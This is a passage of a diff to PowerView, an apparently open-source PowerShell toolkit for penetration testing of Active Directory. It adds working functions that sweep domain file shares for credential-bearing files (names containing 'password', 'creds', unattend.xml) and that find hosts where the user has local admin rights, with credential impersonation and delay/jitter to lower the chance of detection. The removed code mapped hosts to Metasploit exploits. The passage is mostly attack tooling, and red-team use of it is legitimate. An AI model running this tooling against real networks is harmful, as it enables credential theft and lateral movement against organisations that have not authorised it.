wildcards accepted. - Switch. Don't ping each host to ensure it's up before enumerating. +.PARAMETER ComputerServicePack - .PARAMETER Delay +Search computers with a specific service pack, wildcards accepted. - Delay between enumerating hosts, defaults to 0 +.PARAMETER ComputerSiteName - .PARAMETER Jitter +Search computers in the specific AD Site name, wildcards accepted. - Jitter for the host delay, defaults to +/- 0.3 +.PARAMETER Include - .PARAMETER Domain +Only return files/folders that match the specified array of strings, +i.e. @(*.doc*, *.xls*, *.ppt*) - Domain to query for machines, defaults to the current domain. - - .PARAMETER DomainController +.PARAMETER SharePath + +Specifies one or more specific share paths to search, in the form \\COMPUTER\Share + +.PARAMETER ExcludedShares + +Specifies share paths to exclude, default of C$, Admin$, Print$, IPC$. + +.PARAMETER LastAccessTime + +Only return files with a LastAccessTime greater than this date value. + +.PARAMETER LastWriteTime + +Only return files with a LastWriteTime greater than this date value. - Domain controller to reflect LDAP queries through. +.PARAMETER CreationTime - .PARAMETER SearchForest +Only return files with a CreationTime greater than this date value. - Switch. Search all domains in the forest for target users instead of just - a single domain. +.PARAMETER OfficeDocs - .PARAMETER Threads +Switch. Search for office documents (*.doc*, *.xls*, *.ppt*) - The maximum concurrent threads to execute. +.PARAMETER FreshEXEs - .EXAMPLE +Switch. Find .EXEs accessed within the last 7 days. - PS C:\> Find-LocalAdminAccess +.PARAMETER Server - Find machines on the local domain where the current user has local - administrator access. +Specifies an Active Directory server (domain controller) to bind to. - .EXAMPLE +.PARAMETER SearchScope - PS C:\> Find-LocalAdminAccess -Threads 10 +Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree). - Multi-threaded access hunting, replaces Find-LocalAdminAccessThreaded. +.PARAMETER ResultPageSize - .EXAMPLE +Specifies the PageSize to set for the LDAP searcher object. - PS C:\> Find-LocalAdminAccess -Domain testing +.PARAMETER ServerTimeLimit - Find machines on the 'testing' domain where the current user has - local administrator access. +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. - .EXAMPLE +.PARAMETER Tombstone - PS C:\> Find-LocalAdminAccess -ComputerFile hosts.txt +Switch. Specifies that the searcher should also return deleted/tombstoned objects. - Find which machines in the host list the current user has local - administrator access. +.PARAMETER Credential - .LINK +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain and target systems. - https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/local_admin_search_enum.rb - http://www.harmj0y.net/blog/penetesting/finding-local-admin-with-the-veil-framework/ +.PARAMETER Delay + +Specifies the delay (in seconds) between enumerating hosts, defaults to 0. + +.PARAMETER Jitter + +Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3 + +.PARAMETER Threads + +The number of threads to use for user searching, defaults to 20. + +.EXAMPLE + +Find-InterestingDomainShareFile + +Finds 'interesting' files on the current domain. + +.EXAMPLE + +Find-InterestingDomainShareFile -ComputerName @('windows1.testlab.local','windows2.testlab.local') + +Finds 'interesting' files on readable shares on the specified systems. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('DEV\dfm.a', $SecPassword) +Find-DomainShare -Domain testlab.local -Credential $Cred + +Searches interesting files in the testlab.local domain using the specified alternate credentials. + +.OUTPUTS + +PowerView.FoundFile #> - [CmdletBinding()] - param( - [Parameter(Position=0,ValueFromPipeline=$True)] - [Alias('Hosts')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.FoundFile')] + [CmdletBinding(DefaultParameterSetName = 'FileSpecification')] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DNSHostName')] [String[]] $ComputerName, - [ValidateScript({Test-Path -Path $_ })] - [Alias('HostList')] + [ValidateNotNullOrEmpty()] [String] - $ComputerFile, + $ComputerDomain, + [ValidateNotNullOrEmpty()] [String] - $ComputerFilter, + $ComputerLDAPFilter, + [ValidateNotNullOrEmpty()] [String] - $ComputerADSpath, - - [Switch] - $NoPing, - - [UInt32] - $Delay = 0, + $ComputerSearchBase, - [Double] - $Jitter = .3, + [ValidateNotNullOrEmpty()] + [Alias('OperatingSystem')] + [String] + $ComputerOperatingSystem, + [ValidateNotNullOrEmpty()] + [Alias('ServicePack')] [String] - $Domain, + $ComputerServicePack, + [ValidateNotNullOrEmpty()] + [Alias('SiteName')] [String] - $DomainController, + $ComputerSiteName, + [Parameter(ParameterSetName = 'FileSpecification')] + [ValidateNotNullOrEmpty()] + [Alias('SearchTerms', 'Terms')] + [String[]] + $Include = @('*password*', '*sensitive*', '*admin*', '*login*', '*secret*', 'unattend*.xml', '*.vmdk', '*creds*', '*credential*', '*.config'), + + [ValidateNotNullOrEmpty()] + [ValidatePattern('\\\\')] + [Alias('Share')] + [String[]] + $SharePath, + + [String[]] + $ExcludedShares = @('C$', 'Admin$', 'Print$', 'IPC$'), + + [Parameter(ParameterSetName = 'FileSpecification')] + [ValidateNotNullOrEmpty()] + [DateTime] + $LastAccessTime, + + [Parameter(ParameterSetName = 'FileSpecification')] + [ValidateNotNullOrEmpty()] + [DateTime] + $LastWriteTime, + + [Parameter(ParameterSetName = 'FileSpecification')] + [ValidateNotNullOrEmpty()] + [DateTime] + $CreationTime, + + [Parameter(ParameterSetName = 'OfficeDocs')] [Switch] - $SearchForest, + $OfficeDocs, + + [Parameter(ParameterSetName = 'FreshEXEs')] + [Switch] + $FreshEXEs, - [ValidateRange(1,100)] + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] [Int] - $Threads - ) + $ResultPageSize = 200, - begin { - if ($PSBoundParameters['Debug']) { - $DebugPreference = 'Continue' - } + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, - # random object for delay - $RandNo = New-Object System.Random + [Switch] + $Tombstone, - Write-Verbose "[*] Running Find-LocalAdminAccess with delay of $Delay" + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, - # if we're using a host list, read the targets in and add them to the target list - if($ComputerFile) { - $ComputerName = Get-Content -Path $ComputerFile - } + [ValidateRange(1, 10000)] + [Int] + $Delay = 0, - if(!$ComputerName) { - [array]$ComputerName = @() + [ValidateRange(0.0, 1.0)] + [Double] + $Jitter = .3, - if($Domain) { - $TargetDomains = @($Domain) - } - elseif($SearchForest) { - # get ALL the domains in the forest to search - $TargetDomains = Get-NetForestDomain | ForEach-Object { $_.Name } - } - else { - # use the local domain - $TargetDomains = @( (Get-NetDomain).name ) - } + [Int] + [ValidateRange(1, 100)] + $Threads = 20 + ) - ForEach ($Domain in $TargetDomains) { - Write-Verbose "[*] Querying domain $Domain for hosts" - $ComputerName += Get-NetComputer -Filter $ComputerFilter -ADSpath $ComputerADSpath -Domain $Domain -DomainController $DomainController - } - - # remove any null target hosts, uniquify the list and shuffle it - $ComputerName = $ComputerName | Where-Object { $_ } | Sort-Object -Unique | Sort-Object { Get-Random } - if($($ComputerName.Count) -eq 0) { - throw "No hosts found!" - } + BEGIN { + $ComputerSearcherArguments = @{ + 'Properties' = 'dnshostname' + } + if ($PSBoundParameters['ComputerDomain']) { $ComputerSearcherArguments['Domain'] = $ComputerDomain } + if ($PSBoundParameters['ComputerLDAPFilter']) { $ComputerSearcherArguments['LDAPFilter'] = $ComputerLDAPFilter } + if ($PSBoundParameters['ComputerSearchBase']) { $ComputerSearcherArguments['SearchBase'] = $ComputerSearchBase } + if ($PSBoundParameters['ComputerOperatingSystem']) { $ComputerSearcherArguments['OperatingSystem'] = $OperatingSystem } + if ($PSBoundParameters['ComputerServicePack']) { $ComputerSearcherArguments['ServicePack'] = $ServicePack } + if ($PSBoundParameters['ComputerSiteName']) { $ComputerSearcherArguments['SiteName'] = $SiteName } + if ($PSBoundParameters['Server']) { $ComputerSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $ComputerSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $ComputerSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $ComputerSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $ComputerSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $ComputerSearcherArguments['Credential'] = $Credential } + + if ($PSBoundParameters['ComputerName']) { + $TargetComputers = $ComputerName + } + else { + Write-Verbose '[Find-InterestingDomainShareFile] Querying computers in the domain' + $TargetComputers = Get-DomainComputer @ComputerSearcherArguments | Select-Object -ExpandProperty dnshostname + } + Write-Verbose "[Find-InterestingDomainShareFile] TargetComputers length: $($TargetComputers.Length)" + if ($TargetComputers.Length -eq 0) { + throw '[Find-InterestingDomainShareFile] No hosts found to enumerate' } - # script block that enumerates a server + # the host enumeration block we're using to enumerate all servers $HostEnumBlock = { - param($ComputerName, $Ping) + Param($ComputerName, $Include, $ExcludedShares, $OfficeDocs, $ExcludeHidden, $FreshEXEs, $CheckWriteAccess, $TokenHandle) - $Up = $True - if($Ping) { - $Up = Test-Connection -Count 1 -Quiet -ComputerName $ComputerName - } - if($Up) { - # check if the current user has local admin access to this server - $Access = Invoke-CheckLocalAdminAccess -ComputerName $ComputerName - if ($Access.IsAdmin) { - $ComputerName - } + if ($TokenHandle) { + # impersonate the the token produced by LogonUser()/Invoke-UserImpersonation + $Null = Invoke-UserImpersonation -TokenHandle $TokenHandle -Quiet } - } - - } - process { + ForEach ($TargetComputer in $ComputerName) { - if($Threads) { - Write-Verbose "Using threading with threads = $Threads" + $SearchShares = @() + if ($TargetComputer.StartsWith('\\')) { + # if a share is passed as the server + $SearchShares += $TargetComputer + } + else { + $Up = Test-Connection -Count 1 -Quiet -ComputerName $TargetComputer + if ($Up) { + # get the shares for this host and display what we find + $Shares = Get-NetShare -ComputerName $TargetComputer + ForEach ($Share in $Shares) { + $ShareName = $Share.Name + $Path = '\\'+$TargetComputer+'\'+$ShareName + # make sure we get a real share name back + if (($ShareName) -and ($ShareName.Trim() -ne '')) { + # skip this share if it's in the exclude list + if ($ExcludedShares -NotContains $ShareName) { + # check if the user has access to this path + try { + $Null = [IO.Directory]::GetFiles($Path) + $SearchShares += $Path + } + catch { + Write-Verbose "[!] No access to $Path" + } + } + } + } + } + } - # if we're using threading, kick off the script block with Invoke-ThreadedFunction - $ScriptParams = @{ - 'Ping' = $(-not $NoPing) + ForEach ($Share in $SearchShares) { + Write-Verbose "Searching share: $Share" + $SearchArgs = @{ + 'Path' = $Share + 'Include' = $Include + } + if ($OfficeDocs) { + $SearchArgs['OfficeDocs'] = $OfficeDocs + } + if ($FreshEXEs) { + $SearchArgs['FreshEXEs'] = $FreshEXEs + } + if ($LastAccessTime) { + $SearchArgs['LastAccessTime'] = $LastAccessTime + } + if ($LastWriteTime) { + $SearchArgs['LastWriteTime'] = $LastWriteTime + } + if ($CreationTime) { + $SearchArgs['CreationTime'] = $CreationTime + } + if ($CheckWriteAccess) { + $SearchArgs['CheckWriteAccess'] = $CheckWriteAccess + } + Find-InterestingFile @SearchArgs + } } - # kick off the threaded script block + arguments - Invoke-ThreadedFunction -ComputerName $ComputerName -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads + if ($TokenHandle) { + Invoke-RevertToSelf + } } - else { - if(-not $NoPing -and ($ComputerName.count -ne 1)) { - # ping all hosts in parallel - $Ping = {param($ComputerName) if(Test-Connection -ComputerName $ComputerName -Count 1 -Quiet -ErrorAction Stop){$ComputerName}} - $ComputerName = Invoke-ThreadedFunction -NoImports -ComputerName $ComputerName -ScriptBlock $Ping -Threads 100 + $LogonToken = $Null + if ($PSBoundParameters['Credential']) { + if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) { + $LogonToken = Invoke-UserImpersonation -Credential $Credential + } + else { + $LogonToken = Invoke-UserImpersonation -Credential $Credential -Quiet } + } + } - Write-Verbose "[*] Total number of active hosts: $($ComputerName.count)" - $Counter = 0 + PROCESS { + # only ignore threading if -Delay is passed + if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) { - ForEach ($Computer in $ComputerName) { + Write-Verbose "[Find-InterestingDomainShareFile] Total number of hosts: $($TargetComputers.count)" + Write-Verbose "[Find-InterestingDomainShareFile] Delay: $Delay, Jitter: $Jitter" + $Counter = 0 + $RandNo = New-Object System.Random + ForEach ($TargetComputer in $TargetComputers) { $Counter = $Counter + 1 # sleep for our semi-randomized interval Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay) - Write-Verbose "[*] Enumerating server $Computer ($Counter of $($ComputerName.count))" - Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $Computer, $False + Write-Verbose "[Find-InterestingDomainShareFile] Enumerating server $TargetComputer ($Counter of $($TargetComputers.count))" + Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $TargetComputer, $Include, $ExcludedShares, $OfficeDocs, $ExcludeHidden, $FreshEXEs, $CheckWriteAccess, $LogonToken + } + } + else { + Write-Verbose "[Find-InterestingDomainShareFile] Using threading with threads: $Threads" + + # if we're using threading, kick off the script block with New-ThreadedFunction + $ScriptParams = @{ + 'Include' = $Include + 'ExcludedShares' = $ExcludedShares + 'OfficeDocs' = $OfficeDocs + 'ExcludeHidden' = $ExcludeHidden + 'FreshEXEs' = $FreshEXEs + 'CheckWriteAccess' = $CheckWriteAccess + 'TokenHandle' = $LogonToken } + + # if we're using threading, kick off the script block with New-ThreadedFunction using the $HostEnumBlock + params + New-ThreadedFunction -ComputerName $TargetComputers -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads + } + } + + END { + if ($LogonToken) { + Invoke-RevertToSelf -TokenHandle $LogonToken } } } -function Get-ExploitableSystem { +function Find-LocalAdminAccess { <# - .Synopsis +.SYNOPSIS + +Finds machines on the local domain where the current user has local administrator access. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Test-AdminAccess, New-ThreadedFunction + +.DESCRIPTION + +This function enumerates all machines on the current (or specified) domain +using Get-DomainComputer, and for each computer it checks if the current user +has local administrator access using Test-AdminAccess. If -Credential is passed, +then Invoke-UserImpersonation is used to impersonate the specified user +before enumeration, reverting after with Invoke-RevertToSelf. + +Idea adapted from the local_admin_search_enum post module in Metasploit written by: + 'Brandon McCann "zeknox" ' + 'Thomas McCarthy "smilingraccoon" ' + 'Royce Davis "r3dy" ' + +.PARAMETER ComputerName + +Specifies an array of one or more hosts to enumerate, passable on the pipeline. +If -ComputerName is not passed, the default behavior is to enumerate all machines +in the domain returned by Get-DomainComputer. + +.PARAMETER ComputerDomain + +Specifies the domain to query for computers, defaults to the current domain. + +.PARAMETER ComputerLDAPFilter + +Specifies an LDAP query string that is used to search for computer objects. + +.PARAMETER ComputerSearchBase + +Specifies the LDAP source to search through for computers, +e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries. - This module will query Active Directory for the hostname, OS version, and service pack level - for each computer account. That information is then cross-referenced against a list of common - Metasploit exploits that can be used during penetration testing. +.PARAMETER ComputerOperatingSystem - .DESCRIPTION +Search computers with a specific operating system, wildcards accepted. - This module will query Active Directory for the hostname, OS version, and service pack level - for each computer account. That information is then cross-referenced against a list of common - Metasploit exploits that can be used during penetration testing. The script filters out disabled - domain computers and provides the computer's last logon time to help determine if it's been - decommissioned. Also, since the script uses data tables to output affected systems the results - can be easily piped to other commands such as test-connection or a Export-Csv. +.PARAMETER ComputerServicePack - .PARAMETER ComputerName +Search computers with a specific service pack, wildcards accepted. - Return computers with a specific name, wildcards accepted. +.PARAMETER ComputerSiteName - .PARAMETER SPN +Search computers in the specific AD Site name, wildcards accepted. - Return computers with a specific service principal name, wildcards accepted. +.PARAMETER CheckShareAccess - .PARAMETER OperatingSystem +Switch. Only display found shares that the local user has access to. - Return computers with a specific operating system, wildcards accepted. +.PARAMETER Server - .PARAMETER ServicePack +Specifies an Active Directory server (domain controller) to bind to. - Return computers with a specific service pack, wildcards accepted. +.PARAMETER SearchScope - .PARAMETER Filter +Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree). - A customized ldap filter string to use, e.g. "(description=*admin*)" +.PARAMETER ResultPageSize - .PARAMETER Ping +Specifies the PageSize to set for the LDAP searcher object. - Switch. Ping each host to ensure it's up before enumerating. +.PARAMETER ServerTimeLimit - .PARAMETER Domain +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. - The domain to query for computers, defaults to the current domain. +.PARAMETER Tombstone - .PARAMETER DomainController +Switch. Specifies that the searcher should also return deleted/tombstoned objects. - Domain controller to reflect LDAP queries through. +.PARAMETER Credential - .PARAMETER ADSpath +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain and target systems. - The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" - Useful for OU queries. +.PARAMETER Delay - .PARAMETER Unconstrained +Specifies the delay (in seconds) between enumerating hosts, defaults to 0. - Switch. Return computer objects that have unconstrained delegation. +.PARAMETER Jitter - .PARAMETER PageSize +Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3 - The PageSize to set for the LDAP searcher object. +.PARAMETER Threads - .PARAMETER Credential +The number of threads to use for user searching, defaults to 20. - A [Management.Automation.PSCredential] object of alternate credentials - for connection to the target domain. +.EXAMPLE - .EXAMPLE - - The example below shows the standard command usage. Disabled system are excluded by default, but - the "LastLgon" column can be used to determine which systems are live. Usually, if a system hasn't - logged on for two or more weeks it's been decommissioned. - PS C:\> Get-ExploitableSystem -DomainController 192.168.1.1 -Credential demo.com\user | Format-Table -AutoSize - [*] Grabbing computer accounts from Active Directory... - [*] Loading exploit list for critical missing patches... - [*] Checking computers for vulnerable OS and SP levels... - [+] Found 5 potentially vulnerable systems! - ComputerName OperatingSystem ServicePack LastLogon MsfModule CVE - ------------ --------------- ----------- --------- --------- --- - ADS.demo.com Windows Server 2003 Service Pack 2 4/8/2015 5:46:52 PM exploit/windows/dcerpc/ms07_029_msdns_zonename http://www.cvedetails.... - ADS.demo.com Windows Server 2003 Service Pack 2 4/8/2015 5:46:52 PM exploit/windows/smb/ms08_067_netapi http://www.cvedetails.... - ADS.demo.com Windows Server 2003 Service Pack 2 4/8/2015 5:46:52 PM exploit/windows/smb/ms10_061_spoolss http://www.cvedetails.... - LVA.demo.com Windows Server 2003 Service Pack 2 4/8/2015 1:44:46 PM exploit/windows/dcerpc/ms07_029_msdns_zonename http://www.cvedetails.... - LVA.demo.com Windows Server 2003 Service Pack 2 4/8/2015 1:44:46 PM exploit/windows/smb/ms08_067_netapi http://www.cvedetails.... - LVA.demo.com Windows Server 2003 Service Pack 2 4/8/2015 1:44:46 PM exploit/windows/smb/ms10_061_spoolss http://www.cvedetails.... - assess-xppro.demo.com Windows XP Professional Service Pack 3 4/1/2014 11:11:54 AM exploit/windows/smb/ms08_067_netapi http://www.cvedetails.... - assess-xppro.demo.com Windows XP Professional Service Pack 3 4/1/2014 11:11:54 AM exploit/windows/smb/ms10_061_spoolss http://www.cvedetails.... - HVA.demo.com Windows Server 2003 Service Pack 2 11/5/2013 9:16:31 PM exploit/windows/dcerpc/ms07_029_msdns_zonename http://www.cvedetails.... - HVA.demo.com Windows Server 2003 Service Pack 2 11/5/2013 9:16:31 PM exploit/windows/smb/ms08_067_netapi http://www.cvedetails.... - HVA.demo.com Windows Server 2003 Service Pack 2 11/5/2013 9:16:31 PM exploit/windows/smb/ms10_061_spoolss http://www.cvedetails.... - DB1.demo.com Windows Server 2003 Service Pack 2 3/22/2012 5:05:34 PM exploit/windows/dcerpc/ms07_029_msdns_zonename http://www.cvedetails.... - DB1.demo.com Windows Server 2003 Service Pack 2 3/22/2012 5:05:34 PM exploit/windows/smb/ms08_067_netapi http://www.cvedetails.... - DB1.demo.com Windows Server 2003 Service Pack 2 3/22/2012 5:05:34 PM exploit/windows/smb/ms10_061_spoolss http://www.cvedetails.... +Find-LocalAdminAccess - .EXAMPLE +Finds machines in the current domain the current user has admin access to. - PS C:\> Get-ExploitableSystem | Export-Csv c:\temp\output.csv -NoTypeInformation +.EXAMPLE - How to write the output to a csv file. +Find-LocalAdminAccess -Domain dev.testlab.local - .EXAMPLE +Finds machines in the dev.testlab.local domain the current user has admin access to. - PS C:\> Get-ExploitableSystem -Domain testlab.local -Ping +.EXAMPLE - Return a set of live hosts from the testlab.local domain +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Find-LocalAdminAccess -Domain testlab.local -Credential $Cred - .LINK - - http://www.netspi.com - https://github.com/nullbind/Powershellery/blob/master/Stable-ish/ADS/Get-ExploitableSystems.psm1 - - .NOTES - - Author: Scott Sutherland - 2015, NetSPI - Modifications to integrate into PowerView by @harmj0y - Version: Get-ExploitableSystem.psm1 v1.1 - Comments: The technique used to query LDAP was based on the "Get-AuditDSComputerAccount" - function found in Carols Perez's PoshSec-Mod project. The general idea is based off of - Will Schroeder's "Invoke-FindVulnSystems" function from the PowerView toolkit. +Finds machines in the testlab.local domain that the user with the specified -Credential +has admin access to. + +.OUTPUTS + +String + +Computer dnshostnames the current user has administrative access to. #> - [CmdletBinding()] + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType([String])] Param( - [Parameter(ValueFromPipeline=$True)] - [Alias('HostName')] + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DNSHostName')] + [String[]] + $ComputerName, + + [ValidateNotNullOrEmpty()] [String] - $ComputerName = '*', + $ComputerDomain, + [ValidateNotNullOrEmpty()] [String] - $SPN, + $ComputerLDAPFilter, + [ValidateNotNullOrEmpty()] [String] - $OperatingSystem = '*', + $ComputerSearchBase, + [ValidateNotNullOrEmpty()] + [Alias('OperatingSystem')] [String] - $ServicePack = '*', + $ComputerOperatingSystem, + [ValidateNotNullOrEmpty()] + [Alias('ServicePack')] [String] - $Filter, + $ComputerServicePack, + + [ValidateNotNullOrEmpty()] + [Alias('SiteName')] + [String] + $ComputerSiteName, [Switch] - $Ping, + $CheckShareAccess, + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] [String] - $Domain, + $Server, + [ValidateSet('Base', 'OneLevel', 'Subtree')] [String] - $DomainController, + $SearchScope = 'Subtree', - [String] - $ADSpath, + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, [Switch] - $Unconstrained, + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [ValidateRange(1, 10000)] + [Int] + $Delay = 0, + + [ValidateRange(0.0, 1.0)] + [Double] + $Jitter = .3, - [ValidateRange(1,10000)] [Int] - $PageSize = 200, + [ValidateRange(1, 100)] + $Threads = 20 + ) + + BEGIN { + $ComputerSearcherArguments = @{ + 'Properties' = 'dnshostname' + } + if ($PSBoundParameters['ComputerDomain']) { $ComputerSearcherArguments['Domain'] = $ComputerDomain } + if ($PSBoundParameters['ComputerLDAPFilter']) { $ComputerSearcherArguments['LDAPFilter'] = $ComputerLDAPFilter } + if ($PSBoundParameters['ComputerSearchBase']) { $ComputerSearcherArguments['SearchBase'] = $ComputerSearchBase } + if ($PSBoundParameters['Unconstrained']) { $ComputerSearcherArguments['Unconstrained'] = $Unconstrained } + if ($PSBoundParameters['ComputerOperatingSystem']) { $ComputerSearcherArguments['OperatingSystem'] = $OperatingSystem } + if ($PSBoundParameters['ComputerServicePack']) { $ComputerSearcherArguments['ServicePack'] = $ServicePack } + if ($PSBoundParameters['ComputerSiteName']) { $ComputerSearcherArguments['SiteName'] = $SiteName } + if ($PSBoundParameters['Server']) { $ComputerSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $ComputerSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $ComputerSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $ComputerSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $ComputerSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $ComputerSearcherArguments['Credential'] = $Credential } + + if ($PSBoundParameters['ComputerName']) { + $TargetComputers = $ComputerName + } + else { + Write-Verbose '[Find-LocalAdminAccess] Querying computers in the domain' + $TargetComputers = Get-DomainComputer @ComputerSearcherArguments | Select-Object -ExpandProperty dnshostname + } + Write-Verbose "[Find-LocalAdminAccess] TargetComputers length: $($TargetComputers.Length)" + if ($TargetComputers.Length -eq 0) { + throw '[Find-LocalAdminAccess] No hosts found to enumerate' + } + + # the host enumeration block we're using to enumerate all servers + $HostEnumBlock = { + Param($ComputerName, $TokenHandle) + + if ($TokenHandle) { + # impersonate the the token produced by LogonUser()/Invoke-UserImpersonation + $Null = Invoke-UserImpersonation -TokenHandle $TokenHandle -Quiet + } + + ForEach ($TargetComputer in $ComputerName) { + $Up = Test-Connection -Count 1 -Quiet -ComputerName $TargetComputer + if ($Up) { + # check if the current user has local admin access to this server + $Access = Test-AdminAccess -ComputerName $TargetComputer + if ($Access.IsAdmin) { + $TargetComputer + } + } + } + + if ($TokenHandle) { + Invoke-RevertToSelf + } + } + + $LogonToken = $Null + if ($PSBoundParameters['Credential']) { + if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) { + $LogonToken = Invoke-UserImpersonation -Credential $Credential + } + else { + $LogonToken = Invoke-UserImpersonation -Credential $Credential -Quiet + } + } + } + + PROCESS { + # only ignore threading if -Delay is passed + if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) { + + Write-Verbose "[Find-LocalAdminAccess] Total number of hosts: $($TargetComputers.count)" + Write-Verbose "[Find-LocalAdminAccess] Delay: $Delay, Jitter: $Jitter" + $Counter = 0 + $RandNo = New-Object System.Random + + ForEach ($TargetComputer in $TargetComputers) { + $Counter = $Counter + 1 + + # sleep for our semi-randomized interval + Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay) + + Write-Verbose "[Find-LocalAdminAccess] Enumerating server $TargetComputer ($Counter of $($TargetComputers.count))" + Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $TargetComputer, $LogonToken + } + } + else { + Write-Verbose "[Find-LocalAdminAccess] Using threading with threads: $Threads" + + # if we're using threading, kick off the script block with New-ThreadedFunction + $ScriptParams = @{ + 'TokenHandle' = $LogonToken + } + + # if we're using threading, kick off the script block with New-ThreadedFunction using the $HostEnumBlock + params + New-ThreadedFunction -ComputerName $TargetComputers -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads + } + } +} + - [Management.Automation.PSCredential] - $Credential - ) +function Find-DomainLocalGroupMember { +<# +.SYNOPSIS - Write-Verbose "[*] Grabbing computer accounts from Active Directory..." +Enumerates the members of specified local group (default administrators) +for all the targeted machines on the current (or specified) domain. - # Create data table for hostnames, os, and service packs from LDAP - $TableAdsComputers = New-Object System.Data.DataTable - $Null = $TableAdsComputers.Columns.Add('Hostname') - $Null = $TableAdsComputers.Columns.Add('OperatingSystem') - $Null = $TableAdsComputers.Columns.Add('ServicePack') - $Null = $TableAdsComputers.Columns.Add('LastLogon') +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetLocalGroupMember, New-ThreadedFunction - Get-NetComputer -FullData @PSBoundParameters | ForEach-Object { +.DESCRIPTION - $CurrentHost = $_.dnshostname - $CurrentOs = $_.operatingsystem - $CurrentSp = $_.operatingsystemservicepack - $CurrentLast = $_.lastlogon - $CurrentUac = $_.useraccountcontrol +This function enumerates all machines on the current (or specified) domain +using Get-DomainComputer, and enumerates the members of the specified local +group (default of Administrators) for each machine using Get-NetLocalGroupMember. +By default, the API method is used, but this can be modified with '-Method winnt' +to use the WinNT service provider. - $CurrentUacBin = [convert]::ToString($_.useraccountcontrol,2) +.PARAMETER ComputerName - # Check the 2nd to last value to determine if its disabled - $DisableOffset = $CurrentUacBin.Length - 2 - $CurrentDisabled = $CurrentUacBin.Substring($DisableOffset,1) +Specifies an array of one or more hosts to enumerate, passable on the pipeline. +If -ComputerName is not passed, the default behavior is to enumerate all machines +in the domain returned by Get-DomainComputer. - # Add computer to list if it's enabled - if ($CurrentDisabled -eq 0) { - # Add domain computer to data table - $Null = $TableAdsComputers.Rows.Add($CurrentHost,$CurrentOS,$CurrentSP,$CurrentLast) - } - } +.PARAMETER ComputerDomain - # Status user - Write-Verbose "[*] Loading exploit list for critical missing patches..." +Specifies the domain to query for computers, defaults to the current domain. - # ---------------------------------------------------------------- - # Setup data table for list of msf exploits - # ---------------------------------------------------------------- +.PARAMETER ComputerLDAPFilter - # Create data table for list of patches levels with a MSF exploit - $TableExploits = New-Object System.Data.DataTable - $Null = $TableExploits.Columns.Add('OperatingSystem') - $Null = $TableExploits.Columns.Add('ServicePack') - $Null = $TableExploits.Columns.Add('MsfModule') - $Null = $TableExploits.Columns.Add('CVE') - - # Add exploits to data table - $Null = $TableExploits.Rows.Add("Windows 7","","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729") - $Null = $TableExploits.Rows.Add("Windows Server 2000","Server 